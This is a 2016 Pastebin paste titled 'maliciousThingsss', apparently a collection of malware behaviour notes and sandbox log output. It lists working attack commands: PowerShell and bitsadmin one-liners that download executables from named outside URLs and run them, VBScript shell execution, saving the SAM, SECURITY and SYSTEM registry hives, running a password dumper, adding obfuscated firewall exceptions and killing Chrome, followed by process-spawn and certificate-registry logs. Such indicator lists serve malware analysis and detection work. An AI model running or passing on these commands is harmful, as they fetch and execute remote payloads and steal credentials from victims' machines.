API tools faq
paste
Advertisement
opexxx

maliciousThingsss

opexxx
Nov 4th, 2016
329
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 11.32 KB | None | 0 0
raw download clone embed print report
  1. "cmd /c "echo.>Windows_10_Activator_by_T3am_R3d_v1.7_2016.exe:Zone.Identifier""
  2.  
  3. " /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://mnmassagetherapy.com/wp-content/uploads/2016/04/88th0310_nw.exe','mess.exe');Start-Process 'mess.exe'"
  4.  
  5. GetObject('winmgmts:{impersonationLevel=impersonate}').ExecQuery('Select * from Win32_Process Where Name = \''+TYXetqZSGF+'\'');
  6.  
  7. Set qYdIRkazmpwLrkmIp = Createobject("WScRiPt.shelL")
  8. QYDiRkAzMPWLRkmIP.rUN """C:\Users\CwDYSF1\AppData\Roaming\Microsoft\log\securityscan.exe"""
  9.  
  10. integration SKPol
  11. network
  12. fwmanagement
  13.  
  14.  
  15. cmd.exe /r powershell -ExecutionPolicy ByPass -NoProfile -command (New-Object System.Net.WebClient).DownloadFile('http://4thkantonind.top/egypt/hashish/afghankush.php','%TEMP%\calc.exe');Start '%TEMP%\calc.exe';
  16. %WINDIR%\system32\wbem\wmiprvse.exe -secured -Embeddin
  17. regasm.exe
  18. hh.exe
  19.  
  20. "/c bitsadmin /transfer myjob /download /priority high "http://cta.edu.pe/real/let.exe" "%temp%\ltesih.jpg" >nul & "%temp%\ltesih.jpg" & exit" on 2016-9-16.04:29:00.000
  21.  
  22. Copyright 1995-2012 Mark Adler
  23. %WINDIR%\system32\cmd.exe /c "reg.exe save hklm\sam sam.save"
  24. %WINDIR%\system32\cmd.exe /c "reg.exe save hklm\security security.save"
  25. %WINDIR%\system32\cmd.exe /c "reg.exe save hklm\system system.save"
  26. %WINDIR%\system32\cmd.exe /c %APPDATA%\Microsoft\log\pass.exe all
  27. %WINDIR%\system32\cmd.exe /c netsh firewall add allowedprogram program = STcONaURjstoJeQ(uMqeEfSfaGeNmho("yJmAEIBBXdvRXSFRGegUiJnA")) name = STcONaURjstoJeQ(uMqeEfSfaGeNmho("XQ0V1bwVGZ0FQZ==")) mode = ENABLE
  28. %WINDIR%\system32\cmd.exe /c taskkill /f /im chrome.exe
  29. %WINDIR%\system32\cmd.exe /k HOSTNAME
  30. %WINDIR%\system32\cmd.exe /k ipconfig
  31. %WINDIR%\system32\cmd.exe /k systeminfo
  32.  
  33. Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c netsh firewall add allowedprogram program = STcONaURjstoJeQ(uMqeEfSfaGeNmho("yJmAEIBBXdvRXSFRGegUiJnA")) name = STcONaURjstoJeQ(uMqeEfSfaGeNmho("XQ0V1bwVGZ0FQZ==")) mode = ENABLE" (UID: 00032217-00003856)
  34. Spawned process "netsh.exe" with commandline "netsh firewall add allowedprogram program = STcONaURjstoJeQ(uMqeEfSfaGeNmho("yJmAEIBBXdvRXSFRGegUiJnA")) name = STcONaURjstoJeQ(uMqeEfSfaGeNmho("XQ0V1bwVGZ0FQZ==")) mode = ENABLE" (UID: 00032623-00003972)
  35. Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c taskkill /f /im chrome.exe" (UID: 00036046-00002100)
  36. Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c %APPDATA%\Microsoft\log\pass.exe all" (UID: 00036050-00000496)
  37. Spawned process "pass.exe" with commandline "all" (UID: 00036516-00001992)
  38. Spawned process "taskkill.exe" with commandline "taskkill /f /im chrome.exe" (UID: 00036541-00002228)
  39. Spawned process "pass.exe" with commandline "all" (UID: 00038175-00002296)
  40. Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c "reg.exe save hklm\sam sam.save"" (UID: 00039208-00001444)
  41. Spawned process "reg.exe" with commandline "save hklm\sam sam.save" (UID: 00039409-00001940)
  42. Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c "reg.exe save hklm\security security.save"" (UID: 00039658-00002556)
  43. Spawned process "reg.exe" with commandline "save hklm\security security.save" (UID: 00039867-00002588)
  44. "%WINDIR%\system32\cmd.exe /k HOSTNAME" on 2016-10-24.09:06:00.610
  45. "%WINDIR%\system32\cmd.exe /c netsh firewall add allowedprogram program = STcONaURjstoJeQ(uMqeEfSfaGeNmho("yJmAEIBBXdvRXSFRGegUiJnA")) name = STcONaURjstoJeQ(uMqeEfSfaGeNmho("XQ0V1bwVGZ0FQZ==")) mode = ENABLE" on 2016-10-24.09:16:00.180
  46. "%WINDIR%\system32\cmd.exe /c taskkill /f /im chrome.exe" on 2016-10-24.09:52:00.540
  47. "%WINDIR%\system32\cmd.exe /c %APPDATA%\Microsoft\log\pass.exe all" on 2016-10-24.09:52:00.600
  48. "%WINDIR%\system32\cmd.exe /c "reg.exe save hklm\sam sam.save"" on 2016-10-24.10:23:00.500
  49. "%WINDIR%\system32\cmd.exe /c "reg.exe save hklm\security security.save"" on 2016-10-24.10:27:00.901
  50. "%WINDIR%\system32\cmd.exe /c "reg.exe save hklm\system system.save"" on 2016-10-24.10:32:00.410
  51. "%WINDIR%\system32\cmd.exe /k systeminfo" on 2016-10-24.10:48:00.120
  52. "%WINDIR%\system32\cmd.exe /k ipconfig" on 2016-10-24.11:20:00.670
  53. "%WINDIR%\system32\cmd.exe /k HOSTNAME" on 2016-10-24.11:39:00.300
  54.  
  55.  
  56.  
  57.  
  58. Reads Windows Trust Settings
  59. details
  60. "<Input Sample>" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\WINTRUST\TRUST PROVIDERS\SOFTWARE PUBLISHING"; Key: "STATE")
  61.  
  62. "Pa_001.exe" issued a query "Select * from AntiVirusProduct"
  63. "taskkill.exe" issued a query "SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")0"
  64. "powershell.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION"; Key: "INSTALLDATE")
  65.  
  66. "securityscan.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES\8AD5C9987E6F190BD6F5416E2DE44CCD641D8CDA"; Key: "BLOB")
  67. "securityscan.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES\109F1CAED645BB78B3EA2B94C0697C740733031C"; Key: "BLOB")
  68. "securityscan.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES\D559A586669B08F46A30A133F8A9ED3D038E2EA8"; Key: "BLOB")
  69. "securityscan.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES\FEE449EE0E3965A5246F000E87FDE2A065FD89D4"; Key: "BLOB")
  70. "securityscan.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS\A377D1B1C0538833035211F4083D00FECC414DAB"; Key: "BLOB")
  71. "securityscan.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES\637162CC59A3A1E25956FA5FA8F60D2E1C52EAC6"; Key: "BLOB")
  72. "securityscan.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES\7D7F4414CCEF168ADF6BF40753B5BECD78375931"; Key: "BLOB")
  73. "securityscan.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\PROTECTEDROOTS"; Key: "CERTIFICATES")
  74. "securityscan.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\18F7C1FCC3090203FD5BAA2F861A754976C8DD25"; Key: "BLOB")
  75. "securityscan.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\245C97DF7514E7CF2DF8BE72AE957B9E04741E85"; Key: "BLOB")
  76. "securityscan.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\7F88CD7223F3C813818C994614A89C99FA3B5247"; Key: "BLOB")
  77. "securityscan.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\A43489159A520F0D93D032CCAF37E7FE20A8B419"; Key: "BLOB")
  78. "securityscan.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\BE36A4562FB2EE05DBB3D32323ADF445084ED656"; Key: "BLOB")
  79.  
  80.  
  81. "<Input Sample>" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA")
  82. "<Input Sample>" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES")
  83. "<Input Sample>" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS")
  84. "<Input Sample>" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS")
  85. "<Input Sample>" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA")
  86. "<Input Sample>" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES")
  87. "<Input Sample>" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS")
  88. "<Input Sample>" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS")
  89. "<Input Sample>" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED")
  90. "<Input Sample>" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES")
  91. "<Input Sample>" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS")
  92. "<Input Sample>" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLS")
  93. "<Input Sample>" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED")
  94. "<Input Sample>" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES")
  95. "<Input Sample>" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS")
  96. "<Input Sample>" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLS")
  97. "<Input Sample>" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT")
  98. "<Input Sample>" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES")
  99. "<Input Sample>" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CRLS")
  100. "<Input Sample>" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CTLS")
  101.  
  102.  
  103. "<Input Sample>" monitors "\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\crypt32" (Filter: 4)
  104. "<Input Sample>" monitors "HKCU\Software\Microsoft\SystemCertificates\Root" (Filter: 5; Subtree: 1)
  105. "<Input Sample>" monitors "\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT" (Filter: 5; Subtree: 1)
  106. "<Input Sample>" monitors "\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot" (Filter: 5; Subtree: 1)
  107. "<Input Sample>" monitors "\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates" (Filter: 5; Subtree: 1)
  108. "<Input Sample>" monitors "\REGISTRY\MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root" (Filter: 5; Subtree: 1)
  109. "<Input Sample>" monitors "\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot" (Filter: 5; Subtree: 1)
  110. "<Input Sample>" monitors "\REGISTRY\USER\S-1-5-21-4162757579-3804539371-4239455898-1000\Software\Microsoft\SystemCertificates\SmartCardRoot" (Filter: 5; Subtree: 1)
  111. "<Input Sample>" monitors "\REGISTRY\USER\S-1-5-21-4162757579-3804539371-4239455898-1000\Software\Microsoft\SystemCertificates\trust" (Filter: 5; Subtree: 1)
  112. "<Input Sample>" monitors "\REGISTRY\USER\S-1-5-21-4162757579-3804539371-4239455898-1000\Software\Policies\Microsoft\SystemCertificates" (Filter: 5; Subtree: 1)
  113. "<Input Sample>" monitors "\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\trust" (Filter: 5; Subtree: 1)
  114. "<Input Sample>" monitors "\REGISTRY\MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Trust" (Filter: 5; Subtree: 1)
  115. "<Input Sample>" monitors "\REGISTRY\USER\S-1-5-21-4162757579-3804539371-4239455898-1000\Software\Microsoft\SystemCertificates\CA" (Filter: 5; Subtree: 1)
  116. "<Input Sample>" monitors "\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA" (Filter: 5; Subtree: 1)
  117. "<Input Sample>" monitors "\REGISTRY\MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\CA" (Filter: 5; Subtree: 1)
  118. "<Input Sample>" monitors "\REGISTRY\USER\S-1-5-21-4162757579-3804539371-4239455898-1000\Software\Microsoft\SystemCertificates\Disallowed" (Filter: 5; Subtree: 1)
  119. "<Input Sample>" monitors "\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed" (Filter: 5; Subtree: 1)
  120. "<Input Sample>" monitors "\REGISTRY\MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed" (Filter: 5; Subtree: 1)
  121. "<Input Sample>" monitors "\REGISTRY\USER\S-1-5-21-4162757579-3804539371-4239455898-1000\Software\Microsoft\SystemCertificates\TrustedPeople" (Filter: 5; Subtree: 1)
  122. "<Input Sample>" monitors "\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople" (Filter: 5; Subtree: 1)
  123.  
  124.  
  125. End Function"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!